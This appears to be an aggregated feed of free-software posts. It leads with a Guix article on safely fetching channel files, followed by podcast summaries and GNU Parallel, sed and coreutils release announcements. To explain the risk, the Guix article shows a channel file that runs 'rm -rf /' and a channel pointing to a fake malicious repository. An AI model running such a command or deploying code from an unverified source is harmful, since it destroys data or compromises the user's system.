guix time-machine -C channels.scm -- shell …If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:
wget -O channels.scm \
https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …You can even do it in a single command using Bash process substitution!
guix time-machine \
-C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
-- shell …Is it a good idea though?
If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it:
downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise
for wget—that you’re downloading from the genuine github.com doesn’t
tell you anything about the trustworthiness of the code you’re running.
In the case of Guix, the channels.scm you’re downloading could very
well read this:
(system* "rm" "-rf" "/") ;uh-oh!Here system*, as you might have guessed, invokes a
command.
Because yes, channel files can contain arbitrary Scheme code! (It’s
worth noting that this particular problem is one Nix doesn’t have: Nix
being a domain-specific language (DSL) already limits what Nix code can
do, especially with so-called “pure� evaluation.)
Or it could read something like this:
(list (channel
(name 'guix)
;; This is Mallory’s malicious Guix, now you’re PWND!
(url "https://example.org/EVIL/guix.git")
(branch "master")
(introduction
(make-channel-introduction
"badc0ffeed807b096b48283debdcddccfea34bad"
(openpgp-fingerprint
"DEAD CABB A99E F6A8 0D1D E643 A2A0 6DF2 A33A BADD")))))In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.
So no: downloading a channel file and using it without checking it is not reasonable.
Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?
Changes that have just landed in guix pull and guix time-machine aim
to address these seemingly contradictory needs. The two commands are
now equipped to download by themselves: just pass them a URL with the
-C (or --channels) option.
guix time-machine \
-C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
-- …Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.
First, channel code is now evaluated in a “sandbox�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.
With this in place, evaluating a channel file can be considered safe.
Now, one problem remains: the file might list channels that I as a user
do not trust. And here we see a tension between fetching channel files
from out there and keeping one’s system safe. To address that, we
define a new rule: only trusted channels may be deployed; if a channel
file lists untrusted channels, guix pull and guix time-machine error
out. Trusted channels are defined as follows:
~/.config/guix/trusted-channels.scm, if
it exists—this file lists channels just like a regular channel file;guix describe.This brings us to the interesting question of channel identity. This
channel I call guix-science in my trusted-channels.scm, someone else
might as well call it Guix-Science or science; how can I tell if
we’re dealing with the channel that I call guix-science and that I
trust?
The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction� of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:
(channel
(name 'guix-past)
(url "https://codeberg.org/guix-science/guix-past")
(introduction ;this hex soup 👇 is the channel’s identity
(make-channel-introduction
"0c119db2ea86a389769f4d2b9c6f5c41c027e336"
(openpgp-fingerprint
"3CE4 6455 8A84 FDC6 9DB4 0CFB 090B 1199 3D9A EBB5"))))Two channels with the same introduction are one and the same. Thus, if
my trusted-channels.scm contains a channel with the above
introduction, pull and time-machine will happily pull from it.
The corollary is that a channel that cannot be authenticated—i.e., that
lacks the introduction field—cannot be considered a trusted channel.
Overall, this “trusted channel� rule trades flexibility for safety.
It’s a tradeoff but one that looks like a better default than anything
that effectively amounts to arbitrary code execution à la curl | sh.
“Why would I want to download channel files?�, you may ask? Here’s a list of typical use cases we have in mind.
The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:
guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=masterLikewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:
guix time-machine \
-C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
-- shell rstudio -- rstudioA second, similar use case is one-line commands for demos: if you’re
developing an application, you can package it, publish a channel file,
and share a time-machine command to spawn it. With pinned
channels,
you can ensure users run it from a known-good state.
A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.
In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!
The fifth use case is reproducible
research.
A computational workflow can be
captured
by two files: channels.scm and manifest.scm. In some cases, we
might as well download the channel file.
But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?
As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content�—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.
Consider this command:
guix time-machine \
-C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002 \
-- …It downloads the channel file identified by the given SWHID and then proceeds.
The SWHID serves as an unambiguous and unique content address to refer
to a specific channel set. It can be computed using guix hash,
but of course, the channel file must first be present in the Software
Heritage archive. Thus, if the file is part of a version-control
repository, you can first request archiving of that
repository. In a research
paper, one may include a single command to re-run computations the paper
builds upon.
This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing�, channel authentication, and Software Heritage integration.
The whole endeavor—allowing for quick deployment without compromising on
security—might sound quixotic or, some might say, anachronistic, at a
time when the
pips, the
npms,
the
snaps
and many more are all about deploying software of unknown origin like
there’s no tomorrow. In Guix we do believe that transparency,
provenance tracking, and verifiability matter for the software we run;
efforts like this one are guided by these principles.
The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!
I am grateful to Caleb “Reepca� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.
Voice to text, visualising CSVs in the terminal, managing software from releases on GitHub, a mini Android tablet for your wall, and Amiga music on Linux in Discoveries. Plus Ubuntu embracing AI makes us wonder if we should just stop having the same old arguments.
Discoveries
Unix Amiga Delitracker Emulator
News/discussion
I wanted to reply with some clarifications
The Pulse: token spend breaks budgets – what next?
Anthropic joins the Blender Development Fund as Corporate Patron
Upcoming Blender Development Fund and AI Policies
The latest Manjaro 26.1 preview has been released with new desktop versions, a new kernel, and more.
How we get back to our home LANs when we are away travelling etc. It mostly involves WireGuard and Tailscale. We also get into blocking ads, mostly with Pi-hole.
Support us on Patreon and get an ad-free RSS feed with some early episodes
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
In the recent weeks I've been engaging Prot as an Emacs coach to help
with doing review passes over my upcoming ffs package as I work on
polishing and documenting it in preparation for offering it for
inclusion in GNU ELPA.
Yesterday we had our second session focused on ffs, which I recorded
and share publicly with everyone with Prot's permission, so that
others can also benefit from Prot's insights and experience as we
discuss various aspects of Emacs package development with the concrete
example of ffs.
Here is the video recording of our session:
You can view or download the full-resolution video from the Internet Archive.
I addressed most of Prot's feedback about ffs from our first
session, and I'll be working on the changes we discussed in this
session in the next days.
In the last third of the video we switched topics to discuss a few
Emacs-related tangents including adding a 'padding' effect for the
mode line and its constructs, and distilling and separating the
easily-reusable package-like parts of one's Emacs configuration from
the actual configuration of those parts (e.g. the distinction of
prot-lisp and prot-emacs-modules in Prot's Emacs configuration).
For mode line padding, here is the snippet I'm using with Prot's
doric-themes:
(doric-themes-with-colors
(custom-set-faces
`(mode-line
((t :box (:line-width 6 :color ,bg-shadow-intense))))
`(mode-line-inactive
((t :box (:line-width 6 :color ,bg-shadow-subtle))))
`(mode-line-highlight
((t :box (:color ,bg-shadow-intense))))))
Take care, and so long for now.
Microsoft is encouraging employees with the most experience to leave the company and letting users pause Windows updates forever, some of the best features you’ll get in the version of ZFS that ships with the new Ubuntu LTS, and backing up data from cloud services.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Extending ZFS Performance Without Hardware Upgrades
News/discussion
Your Windows update experience just got updated
Free consulting
We were asked about backing up data from cloud services.
This month in Linux Voice.
This month we explore Zenclora OS 2.0, MocaccinoOS 26.03, NebiOS 10.2, and CachyOS 260308.
Ghost is a powerful CMS for beginners and professionals who want to grow a business around their content.
Corporate communication platforms might be convenient, but they put your privacy at risk. The Matrix open communication standard offers a different approach.
This month we explore the top FOSS, including the ultimate FTP client, a 6502 Assembly Environment, and open source levels for Doom.
As I write this, the San Francisco Superior Court has denied Amazon's motion for a summary judgment on a claim in its defense of a State of California lawsuit alleging anticompetitive behavior.
If you're operating a large collection of Linux servers, OpenSCAP can help with regular auditing and system hardening.
Run your own machine translation service with Argos Translate and LibreTranslate.
Fake cryptocurrency wallets in the Snap Store have cost users hundreds of thousands of dollars. A community project aims to create more transparency for Snap package users.
With memcached, you can establish communication between Arduinos, Pi Picos, handhelds, and other small microcontrollers.
Linkwarden lets you bookmark interesting web pages and saves copies in case the originals disappear.
Recent legislative bills put the burden of restricting minor use of technology onto operating systems, which has potential issues.
Turn your Raspberry Pi 500 into an Amiga 500 with the Pimiga 5 Amiga emulator and gain access to a huge selection of Amiga games, demos, and applications.
Linux users associate open source licenses with software, but a bevy of licenses are available for documents, images, audio/video, fonts, and hardware.
To impress his WhatsApp friends, Mike Schilli builds a chatbot in Go that contacts OpenAI on demand and provides answers.
Use qrcp and Warp to move files effortlessly between your Linux computer, your phone, and even remote systems, minus an account, cables, or network wrangling.
AerynOS takes a different path from traditional Linux distros while still providing a user-friendly environment.
There’s a new Ubuntu LTS release and quite a lot is new, Canonical’s infrastructure was taken down and we disagree about whether it could have been avoided, two recent examples of irresponsible vulnerability disclosure, and the Steam controller finally arrives with a hefty price tag.
Plugs
SeaGL 2026 Call for Presentations
News
Canonical releases Ubuntu 26.04 LTS Resolute Raccoon
Ubuntu 26.04 LTS: What’s New Since Ubuntu 24.04?
Pro-Iran group turns Ubuntu DDoS into shakedown
The most severe Linux threat to surface in years catches the world flat-footed
Carrot disclosure: Forgejo and follow-up
Steam Controller: The Ars Technica review
It’s yet another hot questions episode. Colour schemes, syntax highlighting, code patterns, fonts, and keyboards.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
It’s yet another hot questions episode. Colour schemes, syntax highlighting, code patterns, fonts, and keyboards.
Support us on Patreon and get an ad-free RSS feed with early episodes sometimes
See our contact page for ways to get in touch.
Subscribe to the RSS feed
The initial injustice of proprietary software often leads to further injustices: malicious functionalities.
The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.
We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.
A recent attack shone a light on some of the problems with GitHub Actions, and CI/CD more generally. As tempting as it might be, going back to shell scripts probably isn’t the answer.
1K+ cloud environments infected following Trivy supply chain attack
2.5 Admins 292: Trivyally Infected
Support us on patreon and get an ad-free RSS feed with early episodes sometimes
Subscribe to the RSS feed.
GNU Health at the Cyber|Show!
Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️
They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications.
The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️
https://cybershow ... pisodes.php?id=64
About Cyber|Show:
https://cybers ... w.uk/about.php
Get this and latest news about GNU Health from our official Mastodon account:
https://mastodon. ... social/@gnuhealth
Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow
Hitting the limit for hard links, a parent struggles to get back into their teen’s compromised Discord account, the demise of tower PCs and general purpose computing in general, and changing the properties of existing ZFS pools.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Compensating for RAM Constraints with L2ARC on ZFS
News/discussion
How Jennifer Aniston and Friends Cost Us 377GB and Broke ext4 Hardlinks
Dad stuck in support nightmare after teen lied about age on Discord
Apple’s last tower topples… and the others will follow
Free consulting
We were asked about changing the properties of existing ZFS pools.
Whether you can trust small new distros, Amazon is officially abandoning Android on its new TV sticks in favour of their new Linux-based OS, and we have another pointless argument about AI bollocks.
News/discussion
Amazon won’t release Fire Sticks that support sideloading anymore
Eternal November — this new influx of users may be better than the last one
Chris ended up with a managed M4 Macbook Air at work with no sudo or root. So how does a Linux user get on with his first ever Mac? Turns out pretty well, thanks to lots of open source software and a terminal.
Support us on Patreon and get an ad-free RSS feed with some early episodes
See our contact page for ways to get in touch.
Subscribe to the RSS feed.
GNU Parallel 20260422 ('Artemis II') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
It is a fantastic tool for decades!
-- Ops_Mechanic@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.
Microsoft locks devs out of important accounts, the foreign router ban exemptions make even less sense, Backblaze shows that “unlimited” never means that, and attempting to avoid software that’s written with AI.
Plugs
Support us on patreon and get an ad-free RSS feed with some early episodes
Do More with Less: Cost-Efficient Storage on the New TrueNAS with Enhanced Fast Dedup
The Hidden Value of CPU-Intensive Compression on Modern Hardware
News/discussion
Microsoft locks out VeraCrypt and WireGuard devs, blames verification process
Action Required: Account Verification for Windows Hardware Program Begins October 16, 2025
FCC exempts Netgear from ban on foreign routers, doesn’t explain why
Backblaze has quietly stopped backing up your data
Free consulting
We were asked about avoiding software that’s written with AI.
This is to announce sed-4.10, a stable release.
It's been more than 3.5 years and quite a few new bug fixes.
Special thanks to Paul Eggert, Bruno Haible and Collin Funk
for all their help, and especially to Bruno for all the gnulib
support and thorough and indefatigable testing and analysis.
There have been 92 commits by 9 people in the 180 weeks since 4.9.
See the NEWS below for a brief summary.
Thanks to everyone who has contributed!
The following people contributed changes to this release:
Arkadiusz Drabczyk (2)
Ash Roberts (1)
Brun Haible (1)
Bruno Haible (5)
Collin Funk (5)
Hans Ginzel (1)
Jim Meyering (60)
Paul Eggert (16)
Weixie Cui (1)
Jim
[on behalf of the sed maintainers]
==================================================================
Here is the GNU sed home page:
https://gnu.org/s/sed/
Here are the compressed sources:
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz (2.7MB)
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz (1.7MB)
Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz.sig
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
SHA256 (sed-4.10.tar.gz) = TRef+vkuxNzsVB98Ayvhw7mhhW9JcK25WlBSIXAvUnc=
SHA3-256 (sed-4.10.tar.gz) = ftB7Hf2uN4RnayBEgasV7KmqZqCxBUj7e+Am6WDaiKk=
SHA256 (sed-4.10.tar.xz) = uOchgrLslqNXTimYxHt6qmTMIM4ADY6awxPMB87PKMc=
SHA3-256 (sed-4.10.tar.xz) = bVWJvXR28fvhgP1XTpej6t8V+Bh2YI1lL6aGBy1cG5c=
Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.
Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify sed-4.10.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096/0x7FD9FCCB000BEEEE 2010-06-14 [SCEA]
Key fingerprint = 155D 3FC5 00C8 3448 6D1E EA67 7FD9 FCCB 000B EEEE
uid [ unknown] Jim Meyering <jim@meyering.net>
uid [ unknown] Jim Meyering <meyering@fb.com>
uid [ unknown] Jim Meyering <meyering@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key jim@meyering.net
gpg --recv-keys 7FD9FCCB000BEEEE
wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=sed&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify sed-4.10.tar.gz.sig
This release is based on the sed git repository, available as
git clone https://https.git.savannah.gnu.org/git/sed.git
with commit 89b7a2224d4faa9d8baf76094b1232ad1477ef3e tagged as v4.10.
For a summary of changes and contributors, see:
https://gitweb.git.savannah.gnu.org/gitweb/?p=sed.git;a=shortlog;h=v4.10
or run this command from a git-cloned sed directory:
git shortlog v4.9..v4.10
This release was bootstrapped with the following tools:
Autoconf 2.73.1-b400b
Automake 1.18.1.91
Gnulib 2026-04-19 15211966deb52d4cae425c655177a815a88d3fc0
NEWS
* Noteworthy changes in release 4.10 (2026-04-21) [stable]
** Bug fixes
sed 's/a/b/g' (and other global substitutions) now works on input
lines longer than 2GB. Previously, matches beyond the 2^31 byte offset
would evoke a "panic" (exit 4).
[bug present since the beginning]
'sed --follow-symlinks -i' no longer has a TOCTOU race that could let
an attacker swap a symlink between resolution and open, causing sed to
read attacker-chosen content and write it to the original target.
[bug introduced in sed 4.1e]
sed no longer falsely matches when back-references are combined with
optional groups (.?) and the $ anchor. For example, this no longer
falsely matches the empty string at beginning of line:
$ echo ab | sed -E 's/^(.?)(.?).?\2\1$/X/'
Xab
[bug present since "the beginning"]
In --posix mode, sed no longer mishandles backslash escapes (\n,
\t, \a, etc.) after a named character class like [[:alpha:]].
For example, 's/^A\n[[:alpha:]]\n*/XXX/' would fail to match the
trailing newline, treating \n as a literal backslash and an 'n'
rather than a newline. This happened when an earlier backslash
escape in the same regex had already been converted, shifting the
in-place normalization buffer.
[bug introduced in sed 4.9]
sed --debug no longer crashes when a label (":") command is compiled
before the --debug option is processed, e.g., sed -f<(...) --debug.
[bug introduced in sed 4.7 with --debug]
sed no longer rejects the documented GNU extension 'a**' (equivalent
to 'a*') in Basic Regular Expression (BRE) mode. Previously, this
worked only with -E (ERE mode), even though grep has always accepted
it in BRE mode.
[bug present since "the beginning"]
sed no longer rejects "\c[" in regular expressions
[bug present since the beginning]
'sed --follow-symlinks -i' no longer mishandles an operand that is a
short symbolic link to a long symbolic link to a file.
[bug introduced in sed 4.9]
Fix some some longstanding but unlikely integer overflows.
Internally, 'sed' now more often prefers signed integer arithmetic,
which can be checked automatically via 'gcc -fsanitize=undefined'.
** Changes in behavior
In the default C locale, diagnostics now quote 'like this' (with
apostrophes) instead of `like this' (with a grave accent and an
apostrophe). This tracks the GNU coding standards.
'sed --posix' now warns about uses of backslashes in the 's' command
that are handled by GNU sed but are not portable to other
implementations.
** Build-related
builds no longer fail on platforms without the <getopt.h> header or
getopt_long function.
[bug introduced in sed 4.9]
The French government makes a start on moving to the Linux Desktop, the EU has a terrible but open source age verification app, some clarity on one of the exciting office suite dramas, the media swallows Anthropic’s nonsense about their new magically powerful model, a quick KDE Korner, and more.
News
France’s digital agency dumping Windows desktops for Linux
Brussels launched an age checking app. Hackers say it takes 2 minutes to break it
Microsoft locks out VeraCrypt and WireGuard devs, blames verification process
You cannot use the GNU (A)GPL to take software freedom away
AGPLv3§7¶4 Empowers Users to Thwart Badgeware
Project Glasswing: Securing critical software for the AI era
On Anthropic’s Mythos Preview and Project Glasswing
UK gov’s Mythos AI tests help separate cybersecurity threat from hype
A few notes about the massive hype surrounding Claude Mythos
Breathless parroting of Anthropic’s bullshit from the graun
NSA using Anthropic’s Mythos despite blacklist
KDE Korner
Tighter KDE Connect Integration
This is to announce coreutils-9.11, a stable release.
Notable changes include:
- cut(1), nl(1), and un/expand(1) are multi-byte character aware
- cut(1) supports new -w, -F, -O options for better compatibility
- cat(1) and yes(1) use zero-copy I/O on Linux (up to 15x faster)
- date(1) now parses dot delimited dd.mm.yy format
- cksum --check uses more defensive file name quoting
- shuf -i operates up to 2x faster by using unlocked stdio
- wc -l operates up to 4.5x faster on hosts with neon instructions
- wc -m is up to 2.6x faster when processing multi-byte characters
There have also been many bug fixes and other changes
as summarized in the NEWS below.
There have been 306 commits by 12 people in the 10 weeks since 9.10
Thanks to everyone who has contributed!
Bruno Haible (2) Paul Eggert (15)
Chris Down (2) Pádraig Brady (156)
Collin Funk (91) Sam James (1)
Dr. David Alan Gilbert (1) Sylvestre Ledru (17)
Gabriel (1) Weixie Cui (2)
Lukáš Zaoral (2) oech3 (19)
Pádraig [on behalf of the coreutils maintainers]
==================================================================
Here is the GNU coreutils home page:
https://gnu.org/s/coreutils/
Here are the compressed sources:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz (16MB)
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz (6.3MB)
Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz.sig
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz.sig
Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html
Here are the SHA256 and SHA3-256 checksums:
SHA256 (coreutils-9.11.tar.gz) = IDO4owScBr/0mp486nK99Gg7zQy+uXUhHdVtuvi3Nq4=
SHA3-256 (coreutils-9.11.tar.gz) = TwFrSgPuppf+jNggT+aXj037UfVVS2BmYBxXiPLYKxs=
SHA256 (coreutils-9.11.tar.xz) = OUAk7aCllVIXztqc0SAeZdyPo6opwpURNaSVIdV8PMM=
SHA3-256 (coreutils-9.11.tar.xz) = RkpNMip8O4ly+z3Fef9X20AsotbT1ycBZ5UbG84SiNM=
Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.
Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.
Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify coreutils-9.11.tar.gz.sig
The signature should match the fingerprint of the following key:
pub rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]
Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9
uid [ultimate] Pádraig Brady <P@draigBrady.com>
uid [ultimate] Pádraig Brady <pixelbeat@gnu.org>
If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.
gpg --locate-external-key P@draigBrady.com
gpg --recv-keys DF6FD971306037D9
wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -
As a last resort to find the key, you can try the official GNU
keyring:
wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify coreutils-9.11.tar.gz.sig
This release is based on the coreutils git repository, available as
git clone https://https.git.savannah.gnu.org/git/coreutils.git
with commit c01fd163a47468a8296fb369f5233853bb551bb6 tagged as v9.11.
For a summary of changes and contributors, see:
https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.11
or run this command from a git-cloned coreutils directory:
git shortlog v9.10..v9.11
This release was bootstrapped with the following tools:
Autoconf 2.73.1-b400b
Automake 1.18.1
Gnulib 2026-04-19 fb7312fa8d3df29f0ca0678f669b9a5b88a078ec
Bison 3.8.2
NEWS
* Noteworthy changes in release 9.11 (2026-04-20) [stable]
** Bug fixes
'dd' now always diagnoses partial writes correctly upon write failure.
Previously it may have indicated that only full writes were performed.
[This bug was present in "the beginning".]
'fold' will no longer truncate output when encountering 0xFF bytes.
[bug introduced in coreutils-9.8]
'fold' is again responsive to its input. Previously it would have delayed
processing until 256KiB was read from the input.
[bug introduced in coreutils-9.8]
'kill --help' now has links to valid anchors in the html manual.
[bug introduced in coreutils-9.10]
When configured with --enable-systemd, the commands 'pinky',
'uptime', 'users', and 'who' no longer consider the systemd session
classes 'greeter', 'lock-screen', 'background', 'background-light',
and 'none' to be users.
[bug introduced in coreutils-9.4]
'pwd' on ancient systems will no longer overflow a buffer
when operating in deep paths longer than twice the system PATH_MAX.
[bug introduced in coreutils-9.6]
'stat --printf=%%N' no longer performs unnecessary checks of the QUOTING_STYLE
environment variable.
[bug introduced in coreutils-8.26]
'timeout' no longer exits abruptly when its parent is the init process, e.g.,
when started by the entrypoint of a container.
[bug introduced in coreutils-9.10]
** New Features
'cut' now supports multi-byte input and delimiters. Consequently
the -c option is now honored, and no longer an alias for -b, and
the -n option is now honored, and no longer ignored.
Also the -d option supports multi-byte delimiters.
'cut' adds new options for better compatibility:
The -w,--whitespace-delimited option was added to support blank aligned fields
and for better compatibility with FreeBSD/macOS.
The -O option was added as an alias for the --output-delimiter option,
for better compatibility with busybox/toybox.
The -F option was added as an alias for -w -O ' '
for better compatibility with busybox/toybox.
'date --date' now parses dot delimited dd.mm.yy format common in Europe.
This is in addition to the already supported mm/dd/yy and yy-mm-dd formats.
** Changes in behavior
'cksum --check' now uses shell quoting when required, to more robustly
escape file names output in diagnostics.
This also affects md5sum, sha*sum, and b2sum.
** Improvements
'cat' now uses zero-copy I/O on Linux when appropriate, to improve throughput.
E.g., throughput improved 6x from 12.9GiB/s to 81.8GiB/s on a Power10 system.
'df --local' recognises more file system types as remote.
Specifically: autofs, ncpfs, smb, smb2, gfs, gfs2, userlandfs.
'df' improves duplicate mount suppression, by checking each mount against
all previously kept entries for the same device, not just the latest one.
'expand' and 'unexpand' now support multi-byte characters.
'groups' and 'id' will now exit sooner after a write error,
which is significant when listing information for many users.
'install' now allows the combination of the --compare and
--preserve-timestamps options.
'fold', 'join', 'numfmt', 'uniq' now use more consistent blank character
determination on non GLIBC platforms. For example \u3000 (ideographic space)
will be considered a blank character on all platforms.
'nl' now supports multi-byte --section-delimiter characters.
'shuf -i' now operates up to two times faster on systems with unlocked stdio
functions.
'tac' will now exit sooner after a write error, which is significant when
operating on a file with many lines.
'timeout' now properly detects when it is reparented by a subreaper process on
Linux instead of init, e.g., the 'systemd --user' process.
'wc -l' now operates up to four and a half times faster on hosts that support
Neon instructions.
'wc -m' now operates up to 2.6 times faster on GLIBC when processing
non-ASCII UTF-8 characters.
'yes' now uses zero-copy I/O on Linux to significantly increase throughput.
E.g., throughput improved 15x from 11.6GiB/s to 175GiB/s on a Power10 system.
** Build-related
./configure --enable-single-binary=hardlinks is now supported on systems
with dash as the system shell at /bin/sh.
[issue introduced in coreutils-9.10]
